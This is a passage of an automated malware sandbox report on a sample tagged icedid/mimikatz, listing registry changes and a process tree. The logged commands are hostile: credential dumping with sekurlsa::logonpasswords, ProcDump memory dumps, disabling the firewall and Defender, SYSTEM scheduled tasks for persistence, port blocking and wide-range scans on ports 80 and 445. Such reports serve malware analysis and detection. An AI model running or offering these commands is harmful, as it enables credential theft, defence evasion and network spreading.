ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing guwlsyl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" guwlsyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" guwlsyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" guwlsyl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1612 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3248 guwlsyl.exe Token: SeDebugPrivilege 1356 guwlsyl.exe Token: SeDebugPrivilege 3132 vfshost.exe Token: SeDebugPrivilege 3992 ntaiaautl.exe Token: SeLockMemoryPrivilege 2960 ibyaef.exe Token: SeLockMemoryPrivilege 2960 ibyaef.exe Token: SeDebugPrivilege 4432 ntaiaautl.exe Token: SeDebugPrivilege 2936 ntaiaautl.exe Token: SeDebugPrivilege 1956 ntaiaautl.exe Token: SeDebugPrivilege 1728 ntaiaautl.exe Token: SeDebugPrivilege 3960 ntaiaautl.exe Token: SeDebugPrivilege 2020 ntaiaautl.exe Token: SeDebugPrivilege 420 ntaiaautl.exe Token: SeDebugPrivilege 1940 ntaiaautl.exe Token: SeDebugPrivilege 4532 ntaiaautl.exe Token: SeDebugPrivilege 3772 ntaiaautl.exe Token: SeDebugPrivilege 6460 ntaiaautl.exe Token: SeDebugPrivilege 6668 ntaiaautl.exe Token: SeDebugPrivilege 6192 ntaiaautl.exe Token: SeDebugPrivilege 7152 ntaiaautl.exe Token: SeDebugPrivilege 6212 ntaiaautl.exe Token: SeDebugPrivilege 4884 ntaiaautl.exe Token: SeDebugPrivilege 876 ntaiaautl.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 3248 guwlsyl.exe 3248 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 4012 xohudmc.exe 2248 tyxtye.exe 3772 guwlsyl.exe 3772 guwlsyl.exe 2804 guwlsyl.exe 2804 guwlsyl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4924 wrote to memory of 1360 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 93 PID 4924 wrote to memory of 1360 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 93 PID 4924 wrote to memory of 1360 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 93 PID 1360 wrote to memory of 1612 1360 cmd.exe 95 PID 1360 wrote to memory of 1612 1360 cmd.exe 95 PID 1360 wrote to memory of 1612 1360 cmd.exe 95 PID 1360 wrote to memory of 3248 1360 cmd.exe 96 PID 1360 wrote to memory of 3248 1360 cmd.exe 96 PID 1360 wrote to memory of 3248 1360 cmd.exe 96 PID 1356 wrote to memory of 2184 1356 guwlsyl.exe 98 PID 1356 wrote to memory of 2184 1356 guwlsyl.exe 98 PID 1356 wrote to memory of 2184 1356 guwlsyl.exe 98 PID 2184 wrote to memory of 2160 2184 cmd.exe 100 PID 2184 wrote to memory of 2160 2184 cmd.exe 100 PID 2184 wrote to memory of 2160 2184 cmd.exe 100 PID 2184 wrote to memory of 4536 2184 cmd.exe 101 PID 2184 wrote to memory of 4536 2184 cmd.exe 101 PID 2184 wrote to memory of 4536 2184 cmd.exe 101 PID 2184 wrote to memory of 2708 2184 cmd.exe 103 PID 2184 wrote to memory of 2708 2184 cmd.exe 103 PID 2184 wrote to memory of 2708 2184 cmd.exe 103 PID 2184 wrote to memory of 372 2184 cmd.exe 105 PID 2184 wrote to memory of 372 2184 cmd.exe 105 PID 2184 wrote to memory of 372 2184 cmd.exe 105 PID 2184 wrote to memory of 2632 2184 cmd.exe 106 PID 2184 wrote to memory of 2632 2184 cmd.exe 106 PID 2184 wrote to memory of 2632 2184 cmd.exe 106 PID 2184 wrote to memory of 940 2184 cmd.exe 107 PID 2184 wrote to memory of 940 2184 cmd.exe 107 PID 2184 wrote to memory of 940 2184 cmd.exe 107 PID 1356 wrote to memory of 4444 1356 guwlsyl.exe 110 PID 1356 wrote to memory of 4444 1356 guwlsyl.exe 110 PID 1356 wrote to memory of 4444 1356 guwlsyl.exe 110 PID 1356 wrote to memory of 4104 1356 guwlsyl.exe 113 PID 1356 wrote to memory of 4104 1356 guwlsyl.exe 113 PID 1356 wrote to memory of 4104 1356 guwlsyl.exe 113 PID 1356 wrote to memory of 2492 1356 guwlsyl.exe 115 PID 1356 wrote to memory of 2492 1356 guwlsyl.exe 115 PID 1356 wrote to memory of 2492 1356 guwlsyl.exe 115 PID 1356 wrote to memory of 980 1356 guwlsyl.exe 120 PID 1356 wrote to memory of 980 1356 guwlsyl.exe 120 PID 1356 wrote to memory of 980 1356 guwlsyl.exe 120 PID 980 wrote to memory of 3456 980 cmd.exe 122 PID 980 wrote to memory of 3456 980 cmd.exe 122 PID 980 wrote to memory of 3456 980 cmd.exe 122 PID 3456 wrote to memory of 4300 3456 wpcap.exe 123 PID 3456 wrote to memory of 4300 3456 wpcap.exe 123 PID 3456 wrote to memory of 4300 3456 wpcap.exe 123 PID 4300 wrote to memory of 1452 4300 net.exe 125 PID 4300 wrote to memory of 1452 4300 net.exe 125 PID 4300 wrote to memory of 1452 4300 net.exe 125 PID 3456 wrote to memory of 3608 3456 wpcap.exe 126 PID 3456 wrote to memory of 3608 3456 wpcap.exe 126 PID 3456 wrote to memory of 3608 3456 wpcap.exe 126 PID 3608 wrote to memory of 2632 3608 net.exe 128 PID 3608 wrote to memory of 2632 3608 net.exe 128 PID 3608 wrote to memory of 2632 3608 net.exe 128 PID 3456 wrote to memory of 2184 3456 wpcap.exe 129 PID 3456 wrote to memory of 2184 3456 wpcap.exe 129 PID 3456 wrote to memory of 2184 3456 wpcap.exe 129 PID 2184 wrote to memory of 908 2184 net.exe 131 PID 2184 wrote to memory of 908 2184 net.exe 131 PID 2184 wrote to memory of 908 2184 net.exe 131 PID 3456 wrote to memory of 4516 3456 wpcap.exe 132
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1736
-
C:\Windows\TEMP\ttltnyvty\ibyaef.exe"C:\Windows\TEMP\ttltnyvty\ibyaef.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jetgmbly\guwlsyl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1612
-
-
C:\Windows\jetgmbly\guwlsyl.exeC:\Windows\jetgmbly\guwlsyl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3248
-
-
-
C:\Windows\jetgmbly\guwlsyl.exeC:\Windows\jetgmbly\guwlsyl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2160
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2708
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2632
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:940
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4444
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4104
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:2492
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\lbtermtbs\etamgyklt\wpcap.exeC:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1452
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2632
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:908
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:864
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3132
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4688
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1004
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4172
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt2⤵PID:532
-
C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exeC:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lbtermtbs\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2196 -
C:\Windows\lbtermtbs\Corporate\vfshost.exeC:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"2⤵PID:420
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"3⤵
- Creates scheduled task(s)
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"2⤵PID:3000
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"2⤵PID:1716
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4996
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:908
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4988
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:452
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4672
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:468
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:760
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:1192
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:4876
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 784 C:\Windows\TEMP\lbtermtbs\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3080
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4556
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:1048
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4068
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1744
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4620
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:232
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1768
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:532
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2296
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3168
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2320
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1612
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:732
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2908
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3472
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4196
-
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 388 C:\Windows\TEMP\lbtermtbs\388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4012
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 1736 C:\Windows\TEMP\lbtermtbs\1736.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2560 C:\Windows\TEMP\lbtermtbs\2560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2808 C:\Windows\TEMP\lbtermtbs\2808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2952 C:\Windows\TEMP\lbtermtbs\2952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3048 C:\Windows\TEMP\lbtermtbs\3048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3756 C:\Windows\TEMP\lbtermtbs\3756.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:420
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3880 C:\Windows\TEMP\lbtermtbs\3880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3972 C:\Windows\TEMP\lbtermtbs\3972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4056 C:\Windows\TEMP\lbtermtbs\4056.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\lbtermtbs\etamgyklt\scan.bat2⤵PID:4724
-
C:\Windows\lbtermtbs\etamgyklt\itfnybsmt.exeitfnybsmt.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:688
-
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2164 C:\Windows\TEMP\lbtermtbs\2164.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6460
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3216 C:\Windows\TEMP\lbtermtbs\3216.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6668
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2272 C:\Windows\TEMP\lbtermtbs\2272.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6192
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3848 C:\Windows\TEMP\lbtermtbs\3848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:7152
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 348 C:\Windows\TEMP\lbtermtbs\348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6212
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4724 C:\Windows\TEMP\lbtermtbs\4724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2860 C:\Windows\TEMP\lbtermtbs\2860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:2136
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2804
-
-
